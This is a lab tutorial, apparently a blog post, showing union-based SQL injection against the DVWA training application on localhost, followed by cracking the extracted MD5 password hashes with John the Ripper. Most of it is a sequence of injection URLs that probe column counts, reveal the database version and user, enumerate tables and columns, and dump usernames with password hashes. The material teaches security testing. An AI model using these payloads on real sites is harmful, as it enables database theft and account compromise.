
Union Based Injection using John the Ripper
System used :: Kali Linux
Testing on localhost :: 127.0.0.1/login.php (DVWA)
- Open Xampp on Linux and Start MySQL and Apache Server
- Open Iceweasel and write 127. 0 . 0.1/login.php
Login to the Application
Username : admin , Password : password
-
- Setup the security level from ‘High’ to ‘Low’ under DVWA security
-
- Setup the Database under Setup tab
-
- Click on SQL injection to begin testing
- Enter 1 in the User ID Field
User sees the GET method
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
- Check for Exception Handling
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’&Submit=Submit#
- Checking using the True Conditions
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=$’ or ‘1’=’1&Submit=Submit#
The above injection reveal the user id’s in the userdb database.
- Checking for number of columns, returning the SQL query
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 1–+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 5–+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 3–+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ order by 2–+&Submit=Submit#
This shows the number of columns are 2
- Using ‘Union Select’ to consolidate 2 columns
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1’ union select 1, 2–+&Submit=Submit#
- For vulnerable columns, make id=-1
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select 1, 2–+&Submit=Submit#
- Check for version
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, version()–+&Submit=Submit#
- To search for database, version and user
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select concat(database(), ‘ ‘, version()), user()–+&Submit=Submit#
- To search for corresponding details
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, table_name from information_schema.tables –+&Submit=Submit#
- For checking specific table, example ‘users’ , in the particular database, here
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, table_name from information_schema.tables where table_name = “users%”–+&Submit=Submit#
This SQL query will display all the tables consisting of keyword “users”
- Under ‘users’ table, checking for column names
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select null, column_name from information_schema.columns where table_name = “users”–+&Submit=Submit#
- Checking and consolidation all the details of all the columns:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-1’ union select concat(user_id,’ ‘,first_name,’ ‘,last_name,’ ‘avatar),concat(user,’ ‘,password) from users–+&Submit=Submit#
-
- Copy the users & passwords and save them in <user>:<password> format in “password.txt” file under /Home
-
- Using John the Ripper application for cracking the password, with format md5
Hence we have user names & their corresponding passwords.
This is tutorial is by lucideus (rahul tyagi ) Images Quality may not good so that post can load in a proper time ,stay tuned for more tutorials
Read More :Special Interview of India’s Famous White Hat Hacker Rahul Tyagi | Lucideus